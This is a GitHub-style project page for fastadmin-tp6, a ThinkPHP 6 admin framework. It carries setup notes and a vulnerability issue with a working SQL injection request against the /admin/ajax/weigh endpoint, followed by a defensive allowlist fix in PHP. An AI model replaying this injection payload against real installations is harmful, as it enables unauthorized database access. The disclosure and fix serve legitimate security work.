fastadmin-tp6's Introduction

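## FastAdmin ThinkPHP 6.0

The tp6 version is still in testing. It is not suitable for commercial use and is intended for learning only.

The runtime environment requires PHP 7.1+.

Clone this repository: git clone https://github.com/che-my/fastadmin-tp6.git
Install dependencies: composer install
tp6 recommends configuring the application through env environment variables:
cp .example.env .env

Debug mode
APP_DEBUG = true

Trace debug mode: tp6 implements this as a global middleware service. To enable it, uncomment the trace service entry in app\middleware.php.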

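Online demo

FastAdmin has been upgraded to tp6. The following bugs are still waiting to be resolved:

1. The plugin module cannot be used for now.

2. In the online command management module, leaving the two fields "custom controller name" and "custom model" empty (the default) works and code is generated, but some bugs may still remain, so writing the code by hand is recommended.

3. My abilities are limited and fixing the two bugs above is beyond me, so I hope everyone will join in to fix and update them.

4. No other bugs have been found so far.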

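Because of how tp6 addresses controllers that live in a sub-folder of a module application, routes change as follows.

tp6 routing
/module/custom-folder/controller/action fails to resolve;
use the unified form /module/custom-folder.controller/action instead.
For example, /admin/test/index/index -> access fails
Change it to /admin/test.index/index -> access succeeds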

tp6 documentation

Complete development manual

FastAdmin documentation

FastAdmin development documentation

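Copyright information

ThinkPHP is released under the Apache 2 open-source license and is free to use.

Copyright information for third-party source code and binaries included in this project is noted separately.

Copyright © 2006-2019 by ThinkPHP (http://thinkphp.cn)

All rights reserved.

The ThinkPHP® trademark and copyright are owned by 上海顶想信息科技有限公司.

See LICENSE.txt for more details.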

fastadmin-tp6's People

Contributors

che-my

fastadmin-tp6's Issues

Fastadmin-tp6 SQL injection

When a user with administrator rights has logged in the background, SQL injection can be performed during sorting by constructing malicious data.
In file app/admin/controller/Ajax.php line 145, the 'table' parameter passed in here is not filtered, so we can pass a malicious parameter for SQL injection.
POC:

POST /admin/ajax/weigh HTTP/1.1
Host: ***.***
Connection: close
Content-Length: 122
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


ids=1&changeid=8&pid=3&field=weigh&orderway=desc&table=user_rule where if(1=2,1,updatexml(1,concat(0x7e,user(),0x7e),1))--

Example:
Fastadmin SQL Injection
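
A defensive sketch of the check the report says is missing, added here as an example and not taken from the project's code: request values that end up as SQL identifiers are matched against an allowlist before any query is built. The `SORTABLE` map, the `resolveSortTarget` name and the sample requests are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist (assumption): tables the sort endpoint may touch,
// each with its sortable columns. The project's real list would differ.
const SORTABLE = [
    'user_rule' => ['weigh'],
];

// Map untrusted POST values to vetted identifiers. Table and column names
// cannot be bound as prepared-statement parameters, so they are accepted
// only when they match the allowlist exactly.
function resolveSortTarget(array $post): array
{
    $table = $post['table'] ?? null;
    if (!is_string($table) || !array_key_exists($table, SORTABLE)) {
        throw new InvalidArgumentException('table not allowed');
    }
    $field = $post['field'] ?? 'weigh';
    if (!in_array($field, SORTABLE[$table], true)) {
        throw new InvalidArgumentException('field not allowed');
    }
    // Sort direction is a keyword, not data: reduce it to one of two constants.
    $dir = $post['orderway'] ?? '';
    $orderway = (is_string($dir) && strtolower($dir) === 'asc') ? 'ASC' : 'DESC';
    // ids arrives as a comma-separated string; keep positive integers only.
    $raw = is_string($post['ids'] ?? null) ? $post['ids'] : '';
    $ids = array_values(array_filter(array_map('intval', explode(',', $raw)), function (int $id): bool {
        return $id > 0;
    }));
    if ($ids === []) {
        throw new InvalidArgumentException('no valid ids');
    }
    return ['table' => $table, 'field' => $field, 'orderway' => $orderway, 'ids' => $ids];
}

// Constructed inputs shaped like the request in the report above.
$requests = [
    'benign'   => ['ids' => '1,8', 'field' => 'weigh', 'orderway' => 'desc', 'table' => 'user_rule'],
    'tampered' => ['ids' => '1', 'field' => 'weigh', 'orderway' => 'desc', 'table' => 'user_rule where 1=1-- '],
];
foreach ($requests as $label => $post) {
    try {
        $t = resolveSortTarget($post);
        echo "$label: accepted {$t['table']}.{$t['field']} {$t['orderway']}\n";
    } catch (InvalidArgumentException $e) {
        echo "$label: rejected ({$e->getMessage()})\n";
    }
}
```

Only the returned values should reach the query builder; the integer ids can then be bound as ordinary parameters.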
